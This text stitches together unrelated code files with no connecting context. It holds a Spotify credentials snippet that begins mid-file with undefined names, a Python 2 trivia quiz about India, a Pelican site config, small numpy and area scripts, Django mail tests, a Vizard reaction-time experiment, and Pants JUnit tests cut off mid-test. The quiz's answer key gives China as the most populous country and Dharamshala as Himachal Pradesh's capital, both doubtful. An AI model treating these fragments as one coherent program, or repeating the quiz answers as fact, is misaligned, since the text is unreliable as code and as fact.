creds_b64 = base64.b64encode(client_creds.encode())
body = {'grant_type': 'client_credentials'}
header = {'Authorization': f"Basic {creds_b64.decode()}"}
r = requests.post(spotify_url, data = body, headers=header)
# Authenticated spotipy client used by the rest of the module.
auth_manager = SpotifyClientCredentials(client_id=Client_ID, client_secret=Client_Secret)
sp = spotipy.Spotify(auth_manager=auth_manager)
# KBC-style quiz (Python 2): parallel lists where index i describes question i.
questions = ["What is the capital of telangana?","Which is the smallest state in India?","Which is the most populated country in the world?","What is the capital of Himachal Pradesh?","Raipur is the capital of which state of India?"]
first_options = ["Jaipur","Maharastra", "USA","Chandigarh","Chhattisgarh"]
second_options = ["Thiruvananthapuram","Goa","Pakistan","Dharamshala","uttrakhand"]
third_options = ["Chennai","Bihar","China","Shimla","Harayana"]
fourth_options = ["Hydarabad","Rajesthan","India","Delhi","Asam"]
# NOTE(review): all_options is never used below.
all_options = ["first_options","second_options","third_options","fourth_options"]
# 1-based index of the correct option for each question.
ans_key = [4,2,3,2,1]
index = 0
money = 0  # winnings so far, in rupees
# Ask each question in turn; one wrong answer ends the game immediately.
while index < len(questions):
    print " Q-" + str(1 + index)+" : " + questions[index]
    print " 1) :" + first_options[index]
    print " 2) :" + second_options[index]
    print " 3) :" + third_options[index]
    print " 4) :" + fourth_options[index]
    user_input = int(raw_input("Enter your Answer : " ))
    if user_input == ans_key[index]:
        money = money + 1000000
        print "SAHI JAVAB !!! :) "
    else:
        print "GALAT JAVAB (BETTER LUCK NEXT TIME!!) : "
        break
    index = index + 1
print "KHELA KHATAM"
print "AAP JEET GAYE HAI " + str(money) + " RUPEE NAGAD!!!!:) "
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
# --- Site identity ---
AUTHOR = u'Andre Fellipe'
SITEURL = 'https://andrefellipe.com'
SITENAME = u"Andre Fellipe"
SITETITLE = u'Andre Fellipe'
SITESUBTITLE = u'made on the internet'
SITEDESCRIPTION = "Andre's personal site"
SITELOGO = SITEURL + '/images/badge.jpeg'
USER_LOGO_URL = SITEURL + '/images/badge.jpeg'
# --- URL / rendering behaviour ---
RELATIVE_URLS = True
DISABLE_URL_HASH = True
PYGMENTS_STYLE = 'native'
BROWSER_COLOR = '#333333'
ROBOTS = 'index, follow'
# --- Content location and locale ---
PATH = 'content'
TIMEZONE = 'America/Recife'
DEFAULT_LANG = u'en'
OG_LOCALE = u'en_US.utf8'
LOCALE = u'en_US.utf8'
DATE_FORMATS = {
    'en': '%b %d, %Y',
}
# --- Menus ---
MAIN_MENU = True
MENUITEMS = (
    ('Archives', '/archives.html'),
    ('Categories', '/categories.html'),)
HOME_HIDE_TAGS = True
DISPLAY_CATEGORIES_ON_MENU = True
DEFAULT_PAGINATION = 10
# --- Content license shown in the theme footer ---
CC_LICENSE = {
    'name': 'Creative Commons Attribution-ShareAlike',
    'version': '4.0',
    'slug': 'by-sa'
}
COPYRIGHT_YEAR = 2018
# Social widget
SOCIAL = (('linkedin', 'https://www.linkedin.com/in/andrefellipe/'),
          ('github', 'https://github.com/andrefellipe/'),
          ('envelope-o', 'mailto:andrefellipern@gmail.com'),
          )
# --- Static assets copied verbatim into the output ---
STATIC_PATHS = ['images', 'extra']
ARTICLE_EXCLUDES = ['extra']
EXTRA_PATH_METADATA = {
    'extra/CNAME': {'path': 'CNAME'},
    'extra/favicon.ico': {'path': 'favicon.ico'},
}
# --- Theme and plugins ---
USE_LESS = True
THEME = "./flex"
PLUGIN_PATHS = ["./plugins"]
PLUGINS = ['code_include']
# --- Third-party integrations ---
DISQUS_SITENAME = "andrefellipe"
ADD_THIS_ID = 'ra-5ba05ddbeb328e87'
|
import sys, os
import numpy as np
sys.path.append(os.pardir)
from common.util import im2col
# Sanity-check im2col output shapes.
# a1: batch=5, channels=9, 11x11 input; 10x10 filter, stride 2, pad 1
# -> output spatial size 2x2, so rows = 5*2*2 = 20, cols = 9*10*10 = 900.
a1 = np.random.rand(5, 9, 11, 11)
col1 = im2col(a1, 10, 10, stride=2, pad=1)
print(col1.shape) # (20, 900)
# a2: batch=30, channels=7, 9x9 input; same filter -> output spatial 1x1,
# so rows = 30*1*1 = 30, cols = 7*10*10 = 700.
a2 = np.random.rand(30, 7, 9, 9)
col2 = im2col(a2, 10, 10, stride=2, pad=1)
print(col2.shape) # (30, 700)
|
# Read the two side lengths of a rectangle and print its area and perimeter.
a = input("Write a: ")
b = input("Write b: ")
# Convert once so invalid input fails fast with a clear ValueError.
width = float(a)
height = float(b)
S = width * height  # area
print(S)
P = 2 * (width + height)  # perimeter
print(P)
# -*- coding: utf-8 -*-
import pytest
from django.core.management import call_command
from chloroform.mails import ChloroformMailBuilder
from chloroform.models import Contact, Configuration
@pytest.fixture
def cf(settings, db):
    """Load the mail test fixture and yield (default configuration, contact #1).

    NOTE(review): the original decorated this fixture with
    @pytest.mark.django_db, but pytest marks have no effect on fixtures;
    database access is now requested through the `db` fixture argument.
    """
    settings.CHLOROFORM_DOMAIN = 'https://chloroform.emencia.net'
    settings.CHLOROFORM_TARGET_EMAILS = ['chloroform@emencia.net']
    settings.DEFAULT_FROM_EMAIL = 'contact@emencia.net'
    call_command('loaddata', 'chloroform/tests/test_mails.yaml')
    yield Configuration.objects.get_default(), Contact.objects.get(pk=1)
@pytest.mark.django_db
def test_mail_builder(cf):
    """The default template renders and links use the configured domain."""
    configuration, contact = cf
    builder = ChloroformMailBuilder(configuration)
    email = builder.get_email(contact)
    assert 'mark02' in email.body
    assert 'https://chloroform.emencia.net' in email.body
@pytest.mark.django_db
def test_mail_builder_request(cf, rf):
    """When a request is supplied, links use the request's host, not settings."""
    configuration, contact = cf
    request = rf.get('/', SERVER_NAME='chloroform.emencia.org')
    builder = ChloroformMailBuilder(configuration, request=request)
    email = builder.get_email(contact)
    assert 'mark02' in email.body
    assert 'http://chloroform.emencia.org' in email.body
@pytest.mark.django_db
def test_mail_builder_alternative_template(cf):
    """A configuration named 'alternative' selects the alternative template."""
    configuration, contact = cf
    configuration.name = 'alternative'
    email = ChloroformMailBuilder(configuration).get_email(contact)
    assert 'mark01' in email.body
    assert 'https://chloroform.emencia.net' in email.body
@pytest.mark.django_db
def test_mail_builder_to_conf(cf):
    """A target set on the configuration determines the recipient list."""
    configuration, contact = cf
    configuration.target = 'chloroform@emencia.net'
    email = ChloroformMailBuilder(configuration).get_email(contact)
    assert email.to == ['chloroform@emencia.net']
@pytest.mark.django_db
def test_mail_builder_to_default(cf):
    """Without a configuration target, CHLOROFORM_TARGET_EMAILS is used."""
    configuration, contact = cf
    email = ChloroformMailBuilder(configuration).get_email(contact)
    assert email.to == ['chloroform@emencia.net']
@pytest.mark.django_db
def test_mail_builder_from_default(cf):
    """Without CHLOROFORM_FROM_EMAIL, DEFAULT_FROM_EMAIL is the sender."""
    configuration, contact = cf
    email = ChloroformMailBuilder(configuration).get_email(contact)
    assert email.from_email == 'contact@emencia.net'
@pytest.mark.django_db
def test_mail_builder_from_conf(settings, cf):
    """CHLOROFORM_FROM_EMAIL overrides the default sender address."""
    settings.CHLOROFORM_FROM_EMAIL = 'contact@chloroform.net'
    configuration, contact = cf
    email = ChloroformMailBuilder(configuration).get_email(contact)
    assert email.from_email == 'contact@chloroform.net'
@pytest.mark.django_db
def test_mail_builder_metadata(cf):
    """The template context exposes the contact's metadata dictionary."""
    configuration, contact = cf
    builder = ChloroformMailBuilder(configuration)
    context = builder.get_context(contact)
    assert context['metadata'] == {'nom': 'Albert'}
|
"""
The disappearing cross task reimplemented from Blascovich & Katkin 1993.
mattcieslak@gmail.com
"""
from fmri_trigger import TRIGGER_EVENT, RIGHT_BUTTON_EVENT, LEFT_BUTTON_EVENT
import viz, vizact, viztask, vizinfo
# Images
cue = viz.addTexture("images/cue.png")
hbar = viz.addTexture("images/hbar.png")
vbar = viz.addTexture("images/vbar.png")
cross = viz.add("images/cross.png")
# Sounds
correct_sound = viz.addAudio("images/beep-8.wav")
incorrect_sound = viz.addAudio("images/beep-3.wav")
# Text for feedback
block_text = viz.addText("",parent=viz.SCREEN)
block_text.setPosition(0.5,0.8)
block_text.alignment(viz.ALIGN_CENTER_CENTER)
block_text.font("times.ttf")
# How long (seconds) feedback messages stay on screen.
MESSAGE_TIME = 1
# ---------- Configure so responses are mapped to cross components --
# Left button -> "hbar remains" response; right button -> "vbar remains".
HBAR_RESPONSE = viztask.waitEvent(LEFT_BUTTON_EVENT,all=True)
VBAR_RESPONSE = viztask.waitEvent(RIGHT_BUTTON_EVENT,all=True)
# -------------------------------------------------------------------
#Add quad to screen
quad = viz.addTexQuad( viz.SCREEN , pos=(0.5,0.5,0) , scale=(5,5,5) )
#quad.texture(cross)
#quad.texture(cross)
def training_display(rt,acc):
    """Show RIGHT/WRONG feedback plus the reaction time (training blocks)."""
    print "acc",acc
    if acc:
        msg = "RIGHT"
        correct_sound.play()
    else:
        msg = "WRONG"
        incorrect_sound.play()
    block_text.message(msg + " %.2fs"%rt)
    # clear the feedback text after MESSAGE_TIME seconds
    vizact.ontimer2(rate=MESSAGE_TIME, repeats=0,func=clear_text)
def success_display(rt):
    """Play the success beep and briefly show the reaction time."""
    correct_sound.play()
    feedback = "GOOD %.2fs" % rt
    block_text.message(feedback)
    # wipe the message after MESSAGE_TIME seconds
    vizact.ontimer2(rate=MESSAGE_TIME, repeats=0, func=clear_text)
def fail_display(failtype,rt):
    """Play the failure beep and show the failure type with the reaction time."""
    incorrect_sound.play()
    feedback = "%s %.2fs" % (failtype, rt)
    block_text.message(feedback)
    # wipe the message after MESSAGE_TIME seconds
    vizact.ontimer2(rate=MESSAGE_TIME, repeats=0, func=clear_text)
def end_block(correct,ntrials):
    """Display the block score as 'SCORE: correct/ntrials', then clear it."""
    summary = "SCORE: %i/%i" % (correct, ntrials)
    block_text.message(summary)
    # wipe the message after MESSAGE_TIME seconds
    vizact.ontimer2(rate=MESSAGE_TIME, repeats=0, func=clear_text)
def clear_text():
    """Blank the on-screen feedback text."""
    block_text.message("")
def cross_trial(start_time, wait_time, rt_deadline, remove,
                message="",training=False):
    """ Implements a single trial (viztask coroutine)
    Parameters
    ==========
    start_time:float
        IF start_time == 0, wait for the next trigger pulse. Else,
        wait until start_time to begin the trial.
    wait_time:float
        time to wait until the cross should remove one of its lines
    rt_deadline:float
        if the subject did not respond more quickly than the deadline,
        tell them they blew it
    remove:str
        The portion of the cross to remove. Either "hbar" or "vbar".
    message:str
        Currently unused (message display below is commented out).
    training:bool
        Currently unused (training feedback below is commented out).

    Returns (via viztask.returnValue) a dict with the trial description:
    onset, duration, crossbar, response, acc/speed/overall success flags,
    rt, rt_deadline and the texture-change time.
    """
    descr = {"onset":start_time,
             "duration":wait_time,
             "crossbar":remove}
    # texture that REMAINS on screen after the removal
    new_texture = hbar if remove == "vbar" else vbar
    if start_time == 0:
        # start on the next scanner trigger pulse
        yield vizact.waitsignal(TRIGGER_EVENT)
    else:
        # poll every 10 ms until the scheduled onset time
        while viz.tick() < start_time:
            yield viz.waitTime(0.01)
    # ---- If there's a message, display it for MESSAGE_TIME
    #block_text.message(message)
    #vizact.ontimer2(rate=MESSAGE_TIME, repeats=0,func=clear_text)
    # ---- Flash the cue
    quad.texture(cue)
    yield viztask.waitTime(0.5)
    quad.texture(cross)
    # ---- Wait the required time
    yield viztask.waitTime(wait_time)
    # ---- Set the new texture
    quad.texture(new_texture)
    #Wait for next frame to be drawn to screen
    d = yield viztask.waitDraw()
    #Save display time
    displayTime = d.time
    #Wait for a reaction
    reaction = yield viztask.waitAny(
        [HBAR_RESPONSE,
         VBAR_RESPONSE] )
    time_at_response, = reaction.data.data[0]
    # How did they do??
    # -> Hbar remains
    if reaction.condition is HBAR_RESPONSE:
        descr["acc_success"] = remove == "vbar"
        response = "hbar"
    # -> vbar remains
    if reaction.condition is VBAR_RESPONSE:
        descr["acc_success"] = remove == "hbar"
        response = "vbar"
    # print "removed:", remove,"responded:",response
    # Calculate reaction time
    reactionTime = time_at_response - displayTime
    descr["speed_success"] = reactionTime < rt_deadline
    success = descr["speed_success"] and descr["acc_success"]
    # What sort of feedback to give?
    #if training:
    # In training blocks, show the rt
    #yield training_display(reactionTime,descr["acc_success"])
    #else:
    if success:
        yield success_display(reactionTime)
    else:
        # "WRONG" when the response was fast enough but inaccurate;
        # "TIMEOUT" when it missed the deadline.
        failtype = "WRONG" if descr["speed_success"] else "TIMEOUT"
        yield fail_display(failtype, reactionTime)
    quad.texture(cross)
    descr["response"] = response
    descr["success"] = success
    descr["rt"] = reactionTime
    descr["rt_deadline"]= rt_deadline
    descr["changetime"] = d.time
    viztask.returnValue(descr)
def cross_block(list_of_trials,training=False):
    """Run a block of cross trials and return the list of per-trial result dicts.

    The first entry of list_of_trials is used only to announce the RT
    deadline (its third element); actual trials run from list_of_trials[1:].
    """
    # keep track of trial results
    results = []
    successes = 0
    block_text.message("DEADLINE: %.2f"%list_of_trials[0][2])
    vizact.ontimer2(rate=MESSAGE_TIME, repeats=0,func=clear_text)
    # Loop over the rest of the trials
    for trial in list_of_trials[1:]:
        res = yield cross_trial(*trial,training=training)
        results.append(res)
        successes += results[-1]["success"]
    # Display successes at the end
    yield end_block(successes,len(list_of_trials))
    yield viztask.waitTime(4)
    # Clear the message
    block_text.message("")
    viztask.returnValue( results )
if __name__ == "__main__":
    # Stand-alone demo: start the Vizard render loop and run the full
    # experiment as training blocks.
    viz.go()
    viz.clearcolor(viz.GRAY)
    from design.sequence import create_full_experiment
    def multitrial():
        # Schedule every block in sequence and collect all trial results.
        results = []
        blocks = create_full_experiment([0.3, 0.2, 0.4, 0.5])
        for block in blocks:
            results += yield cross_block(block,training=True)
        viztask.returnValue(results)
    res = viztask.schedule(multitrial())
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import re
from textwrap import dedent
from typing import Iterable
import pytest
from internal_plugins.test_lockfile_fixtures.lockfile_fixture import (
JVMLockfileFixture,
JVMLockfileFixtureDefinition,
)
from pants.backend.java.compile.javac import rules as javac_rules
from pants.backend.java.target_types import JavaSourcesGeneratorTarget, JunitTestsGeneratorTarget
from pants.backend.java.target_types import rules as target_types_rules
from pants.backend.scala.compile.scalac import rules as scalac_rules
from pants.backend.scala.target_types import ScalaJunitTestsGeneratorTarget
from pants.backend.scala.target_types import rules as scala_target_types_rules
from pants.core.goals.test import TestResult, get_filtered_environment
from pants.core.target_types import FilesGeneratorTarget, FileTarget, RelocatedFiles
from pants.core.util_rules import config_files, source_files
from pants.core.util_rules.external_tool import rules as external_tool_rules
from pants.engine.addresses import Addresses
from pants.engine.target import CoarsenedTargets
from pants.jvm import classpath
from pants.jvm.jdk_rules import rules as java_util_rules
from pants.jvm.non_jvm_dependencies import rules as non_jvm_dependencies_rules
from pants.jvm.resolve.coursier_fetch import rules as coursier_fetch_rules
from pants.jvm.resolve.coursier_setup import rules as coursier_setup_rules
from pants.jvm.strip_jar import strip_jar
from pants.jvm.target_types import JvmArtifactTarget
from pants.jvm.test.junit import JunitTestRequest
from pants.jvm.test.junit import rules as junit_rules
from pants.jvm.test.testutil import run_junit_test
from pants.jvm.testutil import maybe_skip_jdk_test
from pants.jvm.util_rules import rules as util_rules
from pants.testutil.rule_runner import QueryRule, RuleRunner
# TODO(12812): Switch tests to using parsed junit.xml results instead of scanning stdout strings.
@pytest.fixture
def rule_runner() -> RuleRunner:
    """RuleRunner wired with all JVM/JUnit/Scala rules and target types these tests need."""
    rule_runner = RuleRunner(
        preserve_tmpdirs=True,
        rules=[
            *classpath.rules(),
            *config_files.rules(),
            *coursier_fetch_rules(),
            *coursier_setup_rules(),
            *external_tool_rules(),
            *java_util_rules(),
            *strip_jar.rules(),
            *javac_rules(),
            *junit_rules(),
            *scala_target_types_rules(),
            *scalac_rules(),
            *source_files.rules(),
            *target_types_rules(),
            *util_rules(),
            *non_jvm_dependencies_rules(),
            get_filtered_environment,
            QueryRule(CoarsenedTargets, (Addresses,)),
            QueryRule(TestResult, (JunitTestRequest.Batch,)),
        ],
        target_types=[
            FileTarget,
            FilesGeneratorTarget,
            RelocatedFiles,
            JvmArtifactTarget,
            JavaSourcesGeneratorTarget,
            JunitTestsGeneratorTarget,
            ScalaJunitTestsGeneratorTarget,
        ],
    )
    return rule_runner
@pytest.fixture
def junit4_lockfile_def() -> JVMLockfileFixtureDefinition:
    """Lockfile definition pinning junit 4.13.2 for the vintage-engine tests."""
    return JVMLockfileFixtureDefinition(
        "junit4.test.lock",
        ["junit:junit:4.13.2"],
    )
@pytest.fixture
def junit4_lockfile(
    junit4_lockfile_def: JVMLockfileFixtureDefinition, request
) -> JVMLockfileFixture:
    """Resolved junit4 lockfile fixture, loaded for the requesting test."""
    return junit4_lockfile_def.load(request)
@maybe_skip_jdk_test
def test_vintage_simple_success(
    rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
    """A passing JUnit 4 (vintage) test reports exit code 0 and one success."""
    rule_runner.write_files(
        {
            "3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
            "3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
            "BUILD": dedent(
                """\
                junit_tests(
                    name='example-test',
                    dependencies= [
                        '3rdparty/jvm:junit_junit',
                    ],
                )
                """
            ),
            "SimpleTest.java": dedent(
                """
                package org.pantsbuild.example;
                import junit.framework.TestCase;
                public class SimpleTest extends TestCase {
                   public void testHello(){
                      assertTrue("Hello!" == "Hello!");
                   }
                }
                """
            ),
        }
    )
    test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
    # Success is asserted via exit code and the console summary lines.
    assert test_result.exit_code == 0
    assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
    assert re.search(r"1 tests successful", test_result.stdout) is not None
    assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_vintage_simple_failure(
    rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
    """A failing JUnit 4 assertion yields exit code 1 and an AssertionError in stdout."""
    rule_runner.write_files(
        {
            "3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
            "3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
            "BUILD": dedent(
                """\
                junit_tests(
                    name='example-test',
                    dependencies= [
                        '3rdparty/jvm:junit_junit',
                    ],
                )
                """
            ),
            "SimpleTest.java": dedent(
                """
                package org.pantsbuild.example;
                import org.junit.Test;
                import static org.junit.Assert.*;
                public class SimpleTest {
                   @Test
                   public void helloTest(){
                      assertTrue("Goodbye!" == "Hello!");
                   }
                }
                """
            ),
        }
    )
    test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
    assert test_result.exit_code == 1
    # DOTALL lets the pattern span the multi-line stack trace in stdout.
    assert (
        re.search(
            r"Finished:.*?helloTest.*?Exception: java.lang.AssertionError",
            test_result.stdout,
            re.DOTALL,
        )
        is not None
    )
    assert re.search(r"1 tests failed", test_result.stdout) is not None
    assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_vintage_success_with_dep(
    rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
    """A JUnit 4 test that depends on a java_sources library target compiles and passes."""
    rule_runner.write_files(
        {
            "3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
            "3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
            "BUILD": dedent(
                """\
                java_sources(
                    name='example-lib',
                )
                junit_tests(
                    name = 'example-test',
                    dependencies = [
                        '3rdparty/jvm:junit_junit',
                        '//:example-lib',
                    ],
                )
                """
            ),
            "ExampleLib.java": dedent(
                """
                package org.pantsbuild.example.lib;
                public class ExampleLib {
                   public static String hello() {
                      return "Hello!";
                   }
                }
                """
            ),
            "ExampleTest.java": dedent(
                """
                package org.pantsbuild.example;
                import org.pantsbuild.example.lib.ExampleLib;
                import junit.framework.TestCase;
                public class ExampleTest extends TestCase {
                   public void testHello(){
                      assertTrue(ExampleLib.hello() == "Hello!");
                   }
                }
                """
            ),
        }
    )
    test_result = run_junit_test(rule_runner, "example-test", "ExampleTest.java")
    assert test_result.exit_code == 0
    assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
    assert re.search(r"1 tests successful", test_result.stdout) is not None
    assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_vintage_scala_simple_success(
    rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
    """A passing scala_junit_tests (JUnit 4) target works end to end."""
    rule_runner.write_files(
        {
            "3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
            "3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
            "BUILD": dedent(
                """\
                scala_junit_tests(
                    name='example-test',
                    dependencies= [
                        '3rdparty/jvm:junit_junit',
                    ],
                )
                """
            ),
            "SimpleTest.scala": dedent(
                """
                package org.pantsbuild.example
                import junit.framework.TestCase
                import junit.framework.Assert._
                class SimpleTest extends TestCase {
                   def testHello(): Unit = {
                      assertTrue("Hello!" == "Hello!")
                   }
                }
                """
            ),
        }
    )
    test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.scala")
    assert test_result.exit_code == 0
    assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
    assert re.search(r"1 tests successful", test_result.stdout) is not None
    assert re.search(r"1 tests found", test_result.stdout) is not None
@pytest.fixture
def junit5_lockfile_def() -> JVMLockfileFixtureDefinition:
    """Lockfile definition pinning junit-jupiter-api 5.7.2 for the Jupiter tests."""
    return JVMLockfileFixtureDefinition(
        "junit5.test.lock",
        ["org.junit.jupiter:junit-jupiter-api:5.7.2"],
    )
@pytest.fixture
def junit5_lockfile(
    junit5_lockfile_def: JVMLockfileFixtureDefinition, request
) -> JVMLockfileFixture:
    """Resolved junit5 lockfile fixture, loaded for the requesting test."""
    return junit5_lockfile_def.load(request)
@maybe_skip_jdk_test
def test_jupiter_simple_success(
    rule_runner: RuleRunner, junit5_lockfile: JVMLockfileFixture
) -> None:
    """A passing JUnit 5 (Jupiter) test reports success and produces XML results."""
    rule_runner.write_files(
        {
            "3rdparty/jvm/default.lock": junit5_lockfile.serialized_lockfile,
            "3rdparty/jvm/BUILD": junit5_lockfile.requirements_as_jvm_artifact_targets(),
            "BUILD": dedent(
                """\
                junit_tests(
                    name = 'example-test',
                    dependencies = [
                        '3rdparty/jvm:org.junit.jupiter_junit-jupiter-api',
                    ],
                )
                """
            ),
            "SimpleTest.java": dedent(
                """
                package org.pantsbuild.example;
                import static org.junit.jupiter.api.Assertions.assertEquals;
                import org.junit.jupiter.api.Test;
                class SimpleTests {
                   @Test
                   void testHello(){
                      assertEquals("Hello!", "Hello!");
                   }
                }
                """
            ),
        }
    )
    test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
    assert test_result.exit_code == 0
    # Jupiter runs should also emit junit.xml result files.
    assert test_result.xml_results and test_result.xml_results.files
    assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
    assert re.search(r"1 tests successful", test_result.stdout) is not None
    assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_jupiter_simple_failure(
    rule_runner: RuleRunner, junit5_lockfile: JVMLockfileFixture
) -> None:
    """A failing Jupiter assertion yields exit code 1 and an AssertionFailedError in stdout."""
    rule_runner.write_files(
        {
            "3rdparty/jvm/default.lock": junit5_lockfile.serialized_lockfile,
            "3rdparty/jvm/BUILD": junit5_lockfile.requirements_as_jvm_artifact_targets(),
            "BUILD": dedent(
                """\
                junit_tests(
                    name='example-test',
                    dependencies= [
                        '3rdparty/jvm:org.junit.jupiter_junit-jupiter-api',
                    ],
                )
                """
            ),
            "SimpleTest.java": dedent(
                """
                package org.pantsbuild.example;
                import static org.junit.jupiter.api.Assertions.assertEquals;
                import org.junit.jupiter.api.Test;
                class SimpleTest {
                   @Test
                   void testHello(){
                      assertEquals("Goodbye!", "Hello!");
                   }
                }
                """
            ),
        }
    )
    test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
    assert test_result.exit_code == 1
    assert test_result.xml_results and test_result.xml_results.files
    # DOTALL lets the pattern span the multi-line failure report.
    assert (
        re.search(
            r"Finished:.*?testHello.*?Exception: org.opentest4j.AssertionFailedError: expected: <Goodbye!> but was: <Hello!>",
            test_result.stdout,
            re.DOTALL,
        )
        is not None
    )
    assert re.search(r"1 tests failed", test_result.stdout) is not None
    assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_jupiter_success_with_dep(
    rule_runner: RuleRunner, junit5_lockfile: JVMLockfileFixture
) -> None:
    """A Jupiter test that depends on a java_sources library target compiles and passes."""
    rule_runner.write_files(
        {
            "3rdparty/jvm/default.lock": junit5_lockfile.serialized_lockfile,
            "3rdparty/jvm/BUILD": junit5_lockfile.requirements_as_jvm_artifact_targets(),
            "BUILD": dedent(
                """\
                java_sources(
                    name='example-lib',
                )
                junit_tests(
                    name = 'example-test',
                    dependencies = [
                        '3rdparty/jvm:org.junit.jupiter_junit-jupiter-api',
                        '//:example-lib',
                    ],
                )
                """
            ),
            "ExampleLib.java": dedent(
                """
                package org.pantsbuild.example.lib;
                public class ExampleLib {
                   public static String hello() {
                      return "Hello!";
                   }
                }
                """
            ),
            "SimpleTest.java": dedent(
                """
                package org.pantsbuild.example;
                import static org.junit.jupiter.api.Assertions.assertEquals;
                import org.junit.jupiter.api.Test;
                import org.pantsbuild.example.lib.ExampleLib;
                class SimpleTest {
                   @Test
                   void testHello(){
                      assertEquals(ExampleLib.hello(), "Hello!");
                   }
                }
                """
            ),
        }
    )
    test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
    assert test_result.exit_code == 0
    assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
    assert re.search(r"1 tests successful", test_result.stdout) is not None
    assert re.search(r"1 tests found", test_result.stdout) is not None
def _write_file_dependencies(
    rule_runner: RuleRunner,
    junit_deps: Iterable[str],
    path_to_read: str,
    junit4_lockfile: JVMLockfileFixture,
):
    """Write a junit_tests target plus file/files/relocated_files fixtures.

    junit_deps: extra dependency addresses spliced into the junit_tests target;
    path_to_read: path the generated Java test reads at runtime (asserted to
    contain "lol ducks").
    """
    junit_deps_str = ", ".join(f"'{i}'" for i in junit_deps)
    rule_runner.write_files(
        {
            "3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
            "3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
            "BUILD": dedent(
                f"""\
                junit_tests(
                    name='example-test',
                    dependencies= [
                        '3rdparty/jvm:junit_junit',
                        {junit_deps_str}
                    ],
                )
                file(
                    name="duck",
                    source="ducks.txt",
                )
                files(
                    name="ducks",
                    sources=["*.txt"],
                )
                relocated_files(
                    name="relocated_ducks",
                    files_targets=[":duck"],
                    src="",
                    dest="ducks",
                )
                """
            ),
            "SimpleTest.java": dedent(
                f"""
                package org.pantsbuild.example;
                import junit.framework.TestCase;
                import java.nio.file.Files;
                import java.nio.file.Path;
                public class SimpleTest extends TestCase {{
                   public void testHello() throws Exception {{
                      assertEquals("lol ducks", Files.readString(Path.of("{path_to_read}")));
                   }}
                }}
                """
            ),
            "ducks.txt": "lol ducks",
        }
    )
@maybe_skip_jdk_test
def test_vintage_file_dependency(
    rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
    """A `file` target dependency is materialized in the test sandbox."""
    _write_file_dependencies(rule_runner, [":duck"], "ducks.txt", junit4_lockfile)
    test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
    assert test_result.exit_code == 0
    assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
    assert re.search(r"1 tests successful", test_result.stdout) is not None
    assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_vintage_files_dependencies(
    rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
    """A `files` (glob) target dependency is materialized in the test sandbox."""
    _write_file_dependencies(rule_runner, [":ducks"], "ducks.txt", junit4_lockfile)
    test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
    assert test_result.exit_code == 0
    assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
    assert re.search(r"1 tests successful", test_result.stdout) is not None
    assert re.search(r"1 tests found", test_result.stdout) is not None
@pytest.mark.skip  # TODO(14537) `relocated_files` doesn't presently work, un-skip when fixing that.
@pytest.mark.no_error_if_skipped
@maybe_skip_jdk_test
def test_vintage_relocated_files_dependency(
    rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
    """A `relocated_files` dependency should appear at its relocated path (currently skipped)."""
    _write_file_dependencies(rule_runner, [":relocated_ducks"], "ducks/ducks.txt", junit4_lockfile)
    test_result = run_junit_test(rule_runner, "example-test", "SimpleTest.java")
    assert test_result.exit_code == 0
    assert re.search(r"Finished:\s+testHello", test_result.stdout) is not None
    assert re.search(r"1 tests successful", test_result.stdout) is not None
    assert re.search(r"1 tests found", test_result.stdout) is not None
@maybe_skip_jdk_test
def test_vintage_extra_env_vars(
    rule_runner: RuleRunner, junit4_lockfile: JVMLockfileFixture
) -> None:
    """extra_env_vars on the target and --test-extra-env-vars both reach the JVM,
    with the target-level value overriding the option-level one."""
    rule_runner.write_files(
        {
            "3rdparty/jvm/default.lock": junit4_lockfile.serialized_lockfile,
            "3rdparty/jvm/BUILD": junit4_lockfile.requirements_as_jvm_artifact_targets(),
            "BUILD": dedent(
                """\
                junit_tests(
                    name="example-test",
                    extra_env_vars=[
                        "JUNIT_TESTS_VAR_WITHOUT_VALUE",
